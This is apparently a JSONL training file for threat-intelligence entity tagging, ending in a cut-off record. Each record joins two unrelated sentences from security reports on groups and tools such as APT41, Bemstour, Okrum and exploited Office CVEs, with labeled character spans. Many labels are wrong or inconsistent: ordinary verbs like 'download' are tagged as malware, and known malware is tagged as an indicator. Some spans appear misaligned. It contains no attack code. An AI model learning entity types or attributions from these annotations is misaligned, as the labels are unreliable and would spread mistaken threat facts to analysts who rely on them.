ined in the archive is called DriverInstallerU.exe\u201d but its metadata shows that its original name is Interenet Assistant.exe\u201d .", "spans": [{"start": 12, "end": 21, "label": "Organization"}, {"start": 156, "end": 177, "label": "Indicator"}, {"start": 227, "end": 251, "label": "Indicator"}]} {"text": "With no clear declaration of usage from Shun Wang , nor proper regulatory supervision , such data could circulate into underground markets for further exploit , ranging from rogue marketing , targeted telephone scams or even friend referral program abuse during November\u2019s Single\u2019s Day and December\u2019s Asian online shopping fest . In this sample , however , the module names were changed from actors and characters\u2019 names to car models , namely BMW_x1\u201d , BMW_x2\u201d and up to BMW_x8\u201d .", "spans": [{"start": 40, "end": 49, "label": "Organization"}, {"start": 444, "end": 451, "label": "Indicator"}, {"start": 454, "end": 461, "label": "Indicator"}, {"start": 472, "end": 479, "label": "Indicator"}]} {"text": "In Operation Sheep\u2019s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 .", "spans": [{"start": 28, "end": 37, "label": "Organization"}, {"start": 125, "end": 136, "label": "Indicator"}, {"start": 142, "end": 154, "label": "Malware"}, {"start": 210, "end": 212, "label": "System"}]} {"text": "APT41 has executed multiple software supply chain compromises , gaining access to software companies to inject malicious code into legitimate files before distributing updates . 
Furthermore , it has similar code logic as previous ones wuaupdt.exe in this attack appears in previous Donot attack , and C2 addresses are same to previous ones .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 235, "end": 246, "label": "Indicator"}, {"start": 301, "end": 303, "label": "System"}]} {"text": "Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well .", "spans": [{"start": 62, "end": 67, "label": "Organization"}, {"start": 291, "end": 298, "label": "Indicator"}, {"start": 303, "end": 311, "label": "Indicator"}]} {"text": "We believe that like other Chinese espionage operators , APT41 has moved toward strategic intelligence collection and establishing access , but away from direct intellectual property theft . As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC .", "spans": [{"start": 57, "end": 62, "label": "Organization"}, {"start": 257, "end": 275, "label": "Indicator"}]} {"text": "In June 2018 , APT41 sent spear-phishing emails using an invitation lure to join a decentralized gaming platform linked to a cryptocurrency service (Figure 5) that had positioned itself as a medium of exchange for online games and gambling sites . 
Throughout our investigation , we have found evidence that shows operational similarities between this implant and Gamaredon Group .", "spans": [{"start": 15, "end": 20, "label": "Organization"}, {"start": 351, "end": 358, "label": "Indicator"}, {"start": 363, "end": 372, "label": "Organization"}]} {"text": "We suggest that APT41 sought to target in-game currency but found they could not monetize the specific targeted game , so the group resorted to ransomware to attempt to salvage their efforts and profit from the compromise . The techniques and modules employed by EvilGnome \u2014 that is the use of SFX , persistence with task scheduler and the deployment of information stealing tools\u2014remind us of Gamaredon Group\u2019s Windows tools .", "spans": [{"start": 16, "end": 21, "label": "Organization"}, {"start": 263, "end": 272, "label": "Organization"}, {"start": 294, "end": 297, "label": "Malware"}, {"start": 412, "end": 425, "label": "Indicator"}]} {"text": "In addition to the aforementioned post-exploitation tools , the actors used these webshells to upload legitimate executables that they would use DLL sideloading to run a malicious DLL that has code overlaps with known Emissary Panda attacks . We can observe that the sample is very recent , created on Thursday , July 4", "spans": [{"start": 218, "end": 232, "label": "Organization"}, {"start": 267, "end": 273, "label": "Indicator"}]} {"text": "In April 2019 , several national security organizations released alerts on CVE-2019-0604 exploitation , including the Saudi Arabian National Cyber Security Center and the Canadian Center for Cyber Security . 
As can be observed in the illustration above , the makeself script is instructed to run ./setup.sh after unpacking .", "spans": [{"start": 75, "end": 88, "label": "Vulnerability"}, {"start": 141, "end": 162, "label": "Organization"}, {"start": 171, "end": 186, "label": "Organization"}, {"start": 259, "end": 274, "label": "Indicator"}, {"start": 296, "end": 306, "label": "Indicator"}]} {"text": "Both of these alerts discussed campaigns in which actors used the CVE-2019-0604 to exploit SharePoint servers to install the China Chopper webshell . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone .", "spans": [{"start": 50, "end": 56, "label": "Organization"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 125, "end": 147, "label": "System"}, {"start": 154, "end": 173, "label": "Indicator"}, {"start": 179, "end": 189, "label": "Malware"}]} {"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . 
makeself.sh is a small shell script that generates a self-extractable compressed tar archive from a directory .", "spans": [{"start": 99, "end": 108, "label": "Malware"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 189, "end": 197, "label": "Malware"}, {"start": 198, "end": 210, "label": "Malware"}, {"start": 295, "end": 301, "label": "Malware"}, {"start": 322, "end": 332, "label": "Malware"}, {"start": 335, "end": 346, "label": "Indicator"}, {"start": 358, "end": 370, "label": "Indicator"}]} {"text": "The Emissary Panda threat group loaded the China Chopper webshell onto SharePoint servers at two Government organizations in the Middle East , which we believe with high confidence involved exploiting a remote code execution vulnerability in SharePoint tracked in CVE-2019-0604 . The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc .", "spans": [{"start": 4, "end": 18, "label": "Organization"}, {"start": 43, "end": 56, "label": "System"}, {"start": 264, "end": 277, "label": "Vulnerability"}, {"start": 284, "end": 287, "label": "Indicator"}]} {"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . 
In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller .", "spans": [{"start": 63, "end": 76, "label": "System"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 194, "end": 203, "label": "Malware"}, {"start": 256, "end": 265, "label": "Indicator"}, {"start": 276, "end": 288, "label": "Organization"}]} {"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . One hour later , Bemstour was used against an educational institution in Belgium .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 109, "end": 122, "label": "Vulnerability"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 190, "end": 198, "label": "Indicator"}, {"start": 246, "end": 253, "label": "Indicator"}]} {"text": "To deliver their malware , the cyber criminals use spearphishing emails with various types of attachments: MS Office documents or spreadsheet files exploiting some known vulnerability like CVE-2017-11882 , or documents with Ole2Link and SCT . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor .", "spans": [{"start": 31, "end": 46, "label": "Organization"}, {"start": 51, "end": 71, "label": "System"}, {"start": 94, "end": 106, "label": "System"}, {"start": 117, "end": 126, "label": "System"}, {"start": 189, "end": 203, "label": "Vulnerability"}, {"start": 209, "end": 218, "label": "System"}, {"start": 243, "end": 251, "label": "Indicator"}, {"start": 305, "end": 326, "label": "Malware"}]} {"text": "This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . 
DoublePulsar is then used to inject a secondary payload , which runs in memory only .", "spans": [{"start": 75, "end": 91, "label": "Organization"}, {"start": 136, "end": 148, "label": "Indicator"}]} {"text": "In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong .", "spans": [{"start": 11, "end": 27, "label": "Organization"}, {"start": 96, "end": 104, "label": "Vulnerability"}, {"start": 155, "end": 163, "label": "Indicator"}, {"start": 164, "end": 171, "label": "Vulnerability"}]} {"text": "The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . Bemstour was used again in June 2017 in an attack against an organization in Luxembourg .", "spans": [{"start": 22, "end": 26, "label": "Organization"}, {"start": 81, "end": 94, "label": "Vulnerability"}, {"start": 131, "end": 139, "label": "Indicator"}]} {"text": "This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro\u2019s Zero Day Initiative (ZDI) that was just patched this April . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam .", "spans": [{"start": 25, "end": 38, "label": "Vulnerability"}, {"start": 90, "end": 103, "label": "Organization"}, {"start": 199, "end": 207, "label": "Indicator"}]} {"text": "The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . 
Development of Bemstour has continued into 2019 .", "spans": [{"start": 4, "end": 8, "label": "Organization"}, {"start": 99, "end": 112, "label": "Vulnerability"}, {"start": 116, "end": 129, "label": "Vulnerability"}, {"start": 147, "end": 155, "label": "Indicator"}]} {"text": "In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . Unlike earlier attacks when Bemstour was delivered using Buckeye's Pirpi backdoor , in this attack Bemstour was delivered to the victim by a different backdoor Trojan ( Backdoor.Filensfer ) .", "spans": [{"start": 43, "end": 48, "label": "Organization"}, {"start": 109, "end": 123, "label": "Vulnerability"}, {"start": 308, "end": 316, "label": "Indicator"}, {"start": 347, "end": 352, "label": "Indicator"}, {"start": 353, "end": 361, "label": "Indicator"}, {"start": 421, "end": 439, "label": "Malware"}, {"start": 440, "end": 446, "label": "Malware"}, {"start": 449, "end": 467, "label": "Malware"}]} {"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . 
The most recent sample of Bemstour seen by Symantec appears to have been compiled on March 23 , 2019 , eleven days after the zero-day vulnerability was patched by Microsoft .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 121, "end": 145, "label": "System"}, {"start": 174, "end": 182, "label": "Indicator"}, {"start": 191, "end": 199, "label": "Organization"}, {"start": 273, "end": 281, "label": "Vulnerability"}, {"start": 311, "end": 320, "label": "Organization"}]} {"text": "Zebrocy activity initiates with spearphishing operations delivering various target profilers and downloaders without the use of any 0day exploits . Filensfer is a family of malware that has been used in targeted attacks since at least 2013 .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 148, "end": 157, "label": "Indicator"}]} {"text": "On Nov14 , 2017 , FireEye observed APT34 using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East . While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) .", "spans": [{"start": 18, "end": 25, "label": "Organization"}, {"start": 35, "end": 40, "label": "Organization"}, {"start": 83, "end": 96, "label": "Vulnerability"}, {"start": 109, "end": 132, "label": "Organization"}, {"start": 160, "end": 168, "label": "Organization"}, {"start": 199, "end": 208, "label": "Indicator"}, {"start": 360, "end": 375, "label": "Indicator"}, {"start": 376, "end": 392, "label": "Malware"}]} {"text": "Google and Microsoft have already confirmed the Russian hacker group APT28 used a Flash vulnerability CVE-2016-7855 along with this kernel privilege escalation flaw to perform a targeted attack . 
CVE-2017-0143 was also used by two other exploit tools\u2014EternalRomance and EternalSynergy\u2014that were released as part of the Shadow Brokers leak in April 2017 .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 11, "end": 20, "label": "Organization"}, {"start": 69, "end": 74, "label": "Organization"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 196, "end": 209, "label": "Vulnerability"}, {"start": 237, "end": 244, "label": "Vulnerability"}, {"start": 245, "end": 265, "label": "Indicator"}, {"start": 270, "end": 289, "label": "Indicator"}]} {"text": "Kaspersky first became aware of BlackOasis\u2019 activities in May 2016 , while investigating another Adobe Flash zero day . Buckeye's exploit tool , EternalRomance , as well as EternalSynergy , can exploit the CVE-2017-0143 message type confusion vulnerability to perform memory corruption on unpatched victim computers .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 32, "end": 43, "label": "Organization"}, {"start": 109, "end": 117, "label": "Vulnerability"}, {"start": 130, "end": 137, "label": "Vulnerability"}, {"start": 145, "end": 159, "label": "Indicator"}, {"start": 173, "end": 187, "label": "Indicator"}, {"start": 194, "end": 201, "label": "Vulnerability"}, {"start": 206, "end": 219, "label": "Indicator"}]} {"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . this RTF exploits again the CVE-2017-1882 on eqnedt32.exe .", "spans": [{"start": 71, "end": 84, "label": "Vulnerability"}, {"start": 100, "end": 115, "label": "Malware"}, {"start": 132, "end": 135, "label": "System"}, {"start": 155, "end": 168, "label": "Vulnerability"}, {"start": 172, "end": 184, "label": "Indicator"}]} {"text": "In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 . 
And the dropper execute the iassvcs.exe to make a side loading and make the persistence .", "spans": [{"start": 44, "end": 59, "label": "Malware"}, {"start": 124, "end": 137, "label": "Vulnerability"}, {"start": 148, "end": 155, "label": "Indicator"}, {"start": 168, "end": 179, "label": "Indicator"}]} {"text": "As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware . Over the past three years , Filensfer has been deployed against organizations in Luxembourg , Sweden , Italy , the UK , and the U.S .", "spans": [{"start": 29, "end": 48, "label": "Malware"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 99, "end": 116, "label": "System"}, {"start": 147, "end": 156, "label": "Indicator"}]} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . Our analysis of this malware shows that it belongs to Hussarini , also known as Sarhust , a backdoor family that has been used actively in APT attacks targeting countries in the ASEAN region since 2014 .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 263, "end": 272, "label": "Indicator"}]} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . 
OutExtra.exe is a signed legitimate application from Microsoft named finder.exe .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 89, "end": 101, "label": "Indicator"}, {"start": 142, "end": 151, "label": "Organization"}, {"start": 158, "end": 168, "label": "Indicator"}]} {"text": "The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . Today , this malware is still actively being used against the Philippines .", "spans": [{"start": 12, "end": 29, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 199, "end": 206, "label": "Malware"}, {"start": 222, "end": 229, "label": "Indicator"}]} {"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx\u201d . Xagent\u201d is the original filename Xagent.exe whereas seems to be the version of the worm .", "spans": [{"start": 34, "end": 42, "label": "Malware"}, {"start": 49, "end": 86, "label": "Vulnerability"}, {"start": 89, "end": 96, "label": "Indicator"}, {"start": 122, "end": 132, "label": "Indicator"}, {"start": 172, "end": 176, "label": "Indicator"}]} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . 
Our technical analysis of the malware used in these attacks showed close ties to BS2005 backdoors from operation Ke3chang , and to a related TidePool malware family discovered by Palo Alto Networks in 2016 that targeted Indian embassies across the globe .", "spans": [{"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 231, "end": 238, "label": "Indicator"}, {"start": 282, "end": 298, "label": "Indicator"}, {"start": 342, "end": 358, "label": "Indicator"}, {"start": 380, "end": 389, "label": "Organization"}]} {"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . The malicious actors behind the Okrum malware were focused on the same targets in Slovakia that were previously targeted by Ketrican 2015 backdoors .", "spans": [{"start": 79, "end": 92, "label": "Vulnerability"}, {"start": 104, "end": 118, "label": "Malware"}, {"start": 153, "end": 166, "label": "Indicator"}, {"start": 259, "end": 268, "label": "Indicator"}]} {"text": "This Gorgon Group campaign leveraged spear phishing emails with Microsoft Word documents exploiting CVE-2017-0199 . We started connecting the dots when we discovered that the Okrum backdoor was used to drop a Ketrican backdoor , freshly compiled in 2017 .", "spans": [{"start": 64, "end": 88, "label": "Malware"}, {"start": 100, "end": 113, "label": "Vulnerability"}, {"start": 175, "end": 189, "label": "Indicator"}, {"start": 209, "end": 226, "label": "Indicator"}]} {"text": "Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . 
In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 30, "end": 57, "label": "Vulnerability"}, {"start": 60, "end": 73, "label": "Vulnerability"}, {"start": 119, "end": 133, "label": "Malware"}, {"start": 136, "end": 149, "label": "Vulnerability"}, {"start": 156, "end": 172, "label": "System"}, {"start": 175, "end": 188, "label": "Vulnerability"}, {"start": 247, "end": 260, "label": "Indicator"}, {"start": 277, "end": 295, "label": "Indicator"}]} {"text": "Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . This time , the attackers used new versions of the RoyalDNS malware and a Ketrican 2017 backdoor .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 19, "end": 32, "label": "Vulnerability"}, {"start": 169, "end": 185, "label": "Indicator"}, {"start": 192, "end": 200, "label": "Indicator"}]} {"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . According to ESET telemetry , Okrum was first detected in December 2016 , and targeted diplomatic missions in Slovakia , Belgium , Chile , Guatemala and Brazil throughout 2017 .", "spans": [{"start": 12, "end": 21, "label": "Malware"}, {"start": 32, "end": 45, "label": "Vulnerability"}, {"start": 49, "end": 68, "label": "Malware"}, {"start": 84, "end": 88, "label": "Organization"}, {"start": 101, "end": 106, "label": "Indicator"}]} {"text": "Both attachments are malicious Word documents that attempt to exploit the Windows OLE Automation Array Remote Code Execution Vulnerability tracked by CVE-2014-6332 . 
According to our telemetry , Okrum was used to target diplomatic missions in Slovakia , Belgium , Chile , Guatemala , and Brazil , with the attackers showing a particular interest in Slovakia .", "spans": [{"start": 21, "end": 45, "label": "Malware"}, {"start": 74, "end": 138, "label": "Vulnerability"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 195, "end": 200, "label": "Indicator"}]} {"text": "POWRUNER was delivered using a malicious RTF file that exploited CVE-2017-0199 . The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation .", "spans": [{"start": 0, "end": 8, "label": "System"}, {"start": 41, "end": 49, "label": "Malware"}, {"start": 65, "end": 78, "label": "Vulnerability"}, {"start": 133, "end": 138, "label": "Indicator"}]} {"text": "This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . According to ClearSky , the suspected Lazarus operatives looked to leverage a vulnerability in outdated WinRAR file-archiving software that hackers have been exploiting since it was disclosed last month .", "spans": [{"start": 5, "end": 18, "label": "Malware"}, {"start": 68, "end": 81, "label": "Malware"}, {"start": 102, "end": 115, "label": "Vulnerability"}, {"start": 286, "end": 294, "label": "Organization"}, {"start": 377, "end": 383, "label": "Indicator"}]} {"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . 
The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals .", "spans": [{"start": 43, "end": 52, "label": "Malware"}, {"start": 68, "end": 81, "label": "Vulnerability"}, {"start": 151, "end": 161, "label": "Indicator"}, {"start": 176, "end": 179, "label": "Indicator"}]} {"text": "Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . If the user enables macro to open the xlsm file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file .", "spans": [{"start": 35, "end": 46, "label": "Malware"}, {"start": 64, "end": 74, "label": "Malware"}, {"start": 88, "end": 105, "label": "Malware"}, {"start": 120, "end": 128, "label": "System"}, {"start": 186, "end": 195, "label": "Malware"}, {"start": 198, "end": 200, "label": "Indicator"}]} {"text": "In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . Create a link file in the startup folder for AutoHotkeyU32.exe , allowing the attack to persist even after a system restart .", "spans": [{"start": 59, "end": 65, "label": "Malware"}, {"start": 70, "end": 95, "label": "Malware"}, {"start": 144, "end": 153, "label": "Indicator"}, {"start": 180, "end": 197, "label": "Indicator"}]} {"text": "The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . 
Such attacks highlight the need for caution before downloading files from unknown sources and enabling macro for files from unknown sources .", "spans": [{"start": 4, "end": 15, "label": "Malware"}, {"start": 30, "end": 68, "label": "Malware"}, {"start": 71, "end": 101, "label": "Malware"}, {"start": 104, "end": 108, "label": "System"}, {"start": 123, "end": 133, "label": "Malware"}, {"start": 141, "end": 148, "label": "Indicator"}]} {"text": "The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . Honeycomb toolserver receives exfiltrated information from the implant; an operator can also task the implant to execute jobs on the target computer , so the toolserver acts as a C2 (command and control) server for the implant .", "spans": [{"start": 4, "end": 19, "label": "Malware"}, {"start": 41, "end": 59, "label": "Malware"}, {"start": 62, "end": 70, "label": "Malware"}, {"start": 73, "end": 81, "label": "Malware"}, {"start": 88, "end": 93, "label": "Malware"}, {"start": 107, "end": 119, "label": "Malware"}, {"start": 122, "end": 131, "label": "Indicator"}, {"start": 301, "end": 303, "label": "System"}]} {"text": "If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . UMBRAGE components cover keyloggers , password collection , webcam capture , data destruction , persistence , privilege escalation , stealth , anti-virus (PSP) avoidance and survey techniques .", "spans": [{"start": 5, "end": 8, "label": "Malware"}, {"start": 106, "end": 146, "label": "Malware"}, {"start": 149, "end": 156, "label": "Indicator"}]} {"text": "This document , written in Vietnamese , appears to be reviewing and discussing best practices for teaching and researching scientific topics . 
'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/Exfiltration tools supporting all major operating systems like Windows ( Bartender ) , MacOS ( JukeBox ) and Linux ( DanceFloor ) .", "spans": [{"start": 5, "end": 13, "label": "Malware"}, {"start": 54, "end": 93, "label": "Malware"}, {"start": 143, "end": 154, "label": "Indicator"}, {"start": 325, "end": 332, "label": "System"}, {"start": 335, "end": 344, "label": "System"}, {"start": 349, "end": 354, "label": "System"}, {"start": 357, "end": 364, "label": "System"}, {"start": 379, "end": 389, "label": "System"}]} {"text": "There is the exploit code and malware used to gain access to systems , the infrastructure that provides command and control to the malware operator , and the human elements \u2013 developers who create the malware , operators who deploy it , and analysts who extract value from the stolen information . This sample , similar to other Trochilus samples , was deployed using a DLL sideloading method utilizing three files , uploaded to the same folder on the victim machine as identified in US-CERT advisory TA17-117A last revised on December 20 , 2018 .", "spans": [{"start": 13, "end": 25, "label": "Malware"}, {"start": 46, "end": 68, "label": "Malware"}, {"start": 95, "end": 123, "label": "Malware"}, {"start": 303, "end": 309, "label": "Indicator"}, {"start": 329, "end": 338, "label": "Indicator"}, {"start": 370, "end": 373, "label": "System"}]} {"text": "This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page . 
The configuration file then loads the Trochilus payload into memory by injecting it into a valid system process .", "spans": [{"start": 53, "end": 62, "label": "Malware"}, {"start": 71, "end": 89, "label": "Malware"}, {"start": 198, "end": 216, "label": "Indicator"}]} {"text": "Upon successful exploitation , the attachment will install the trojan known as NetTraveler using a DLL side-loading attack technique . Additionally , the same DLL sideloading technique observed in the Visma attack was used , and many of the tools deployed by the APT10 shared naming similarities as well 1.bat , cu.exe , ss.rar , r.exe , pd.exe . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL .", "spans": [{"start": 35, "end": 45, "label": "Malware"}, {"start": 51, "end": 69, "label": "Malware"}, {"start": 79, "end": 90, "label": "System"}, {"start": 99, "end": 115, "label": "Malware"}, {"start": 159, "end": 162, "label": "System"}, {"start": 201, "end": 206, "label": "Malware"}, {"start": 263, "end": 268, "label": "Organization"}, {"start": 304, "end": 309, "label": "Malware"}, {"start": 312, "end": 318, "label": "Malware"}, {"start": 321, "end": 327, "label": "Malware"}, {"start": 330, "end": 335, "label": "Malware"}, {"start": 338, "end": 344, "label": "Malware"}, {"start": 368, "end": 374, "label": "Organization"}, {"start": 417, "end": 424, "label": "Indicator"}, {"start": 476, "end": 479, "label": "System"}, {"start": 562, "end": 566, "label": "Indicator"}]} {"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . 
Insikt Group analysis of network metadata to and from the VPN endpoint IPs revealed consistent connectivity to Citrix-hosted infrastructure from all eight VPN endpoint IPs starting on August 17 , 2018 \u2014 the same date the first authenticated login to Visma\u2019s network was made using stolen credentials .", "spans": [{"start": 4, "end": 9, "label": "Malware"}, {"start": 33, "end": 63, "label": "Vulnerability"}, {"start": 66, "end": 79, "label": "Vulnerability"}, {"start": 120, "end": 132, "label": "Malware"}, {"start": 159, "end": 171, "label": "Organization"}, {"start": 217, "end": 220, "label": "System"}, {"start": 270, "end": 283, "label": "Indicator"}, {"start": 314, "end": 317, "label": "System"}]} {"text": "wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . KHRAT is a backdoor trojan purported to be used with the China-linked cyberespionage group DragonOK .", "spans": [{"start": 0, "end": 11, "label": "Malware"}, {"start": 17, "end": 20, "label": "System"}, {"start": 42, "end": 49, "label": "Malware"}, {"start": 54, "end": 74, "label": "Malware"}, {"start": 90, "end": 95, "label": "Indicator"}, {"start": 101, "end": 116, "label": "Malware"}, {"start": 181, "end": 189, "label": "Organization"}]} {"text": "As described in the infection flow , one of the first uses of the AutoHotKey scripts is to upload a screenshot from the compromised PC . Rapid7 reviewed malware discovered in the victim\u2019s environment and found implants that used Dropbox as the C2 .", "spans": [{"start": 66, "end": 84, "label": "Malware"}, {"start": 91, "end": 110, "label": "Malware"}, {"start": 137, "end": 143, "label": "Organization"}, {"start": 229, "end": 236, "label": "Indicator"}, {"start": 244, "end": 246, "label": "System"}]} {"text": "The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . 
The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 .", "spans": [{"start": 4, "end": 7, "label": "Malware"}, {"start": 97, "end": 105, "label": "Malware"}, {"start": 110, "end": 117, "label": "Malware"}, {"start": 120, "end": 128, "label": "Malware"}, {"start": 131, "end": 138, "label": "Malware"}, {"start": 141, "end": 147, "label": "Malware"}, {"start": 150, "end": 168, "label": "Malware"}, {"start": 323, "end": 329, "label": "Indicator"}, {"start": 349, "end": 363, "label": "Vulnerability"}, {"start": 367, "end": 380, "label": "Vulnerability"}]} {"text": "Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . After further analysis , it was discovered that the RTF files were exploiting the CVE-2018-0798 vulnerability in Microsoft \u2019s Equation Editor ( EQNEDT32 ) .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 37, "end": 44, "label": "Malware"}, {"start": 62, "end": 83, "label": "System"}, {"start": 138, "end": 147, "label": "Indicator"}, {"start": 168, "end": 181, "label": "Vulnerability"}, {"start": 199, "end": 208, "label": "Organization"}, {"start": 212, "end": 227, "label": "System"}, {"start": 230, "end": 238, "label": "System"}]} {"text": "DoublePulsar is then used to inject a secondary payload , which runs in memory only . 
Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 .", "spans": [{"start": 0, "end": 12, "label": "Malware"}, {"start": 29, "end": 35, "label": "Malware"}, {"start": 86, "end": 93, "label": "Organization"}, {"start": 172, "end": 175, "label": "Indicator"}, {"start": 191, "end": 198, "label": "Vulnerability"}, {"start": 203, "end": 216, "label": "Vulnerability"}]} {"text": "The detection evasion techniques we observed in the Okrum malware include embedding the malicious payload within a legitimate PNG image , employing several anti-emulation and anti-sandbox tricks , as well as making frequent changes in implementation . The earliest use of the exploit ITW we were able to identify and confirm is a sample (e228045ef57fb8cc1226b62ada7eee9b) dating back to October 2018 (VirusTotal submission of 2018-10-29) with the RTF creation time 2018-10-23 .", "spans": [{"start": 52, "end": 57, "label": "Malware"}, {"start": 74, "end": 83, "label": "Malware"}, {"start": 276, "end": 283, "label": "Vulnerability"}, {"start": 284, "end": 287, "label": "Indicator"}, {"start": 400, "end": 411, "label": "System"}, {"start": 447, "end": 450, "label": "System"}]} {"text": "The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals . Upon decrypting and executing , it drops two additional files wsc_proxy.exe\u201d (legitimate Avast executable) and a malicious DLL wsc.dll\u201d in the %TEMP% folder .", "spans": [{"start": 67, "end": 77, "label": "Malware"}, {"start": 92, "end": 105, "label": "Malware"}, 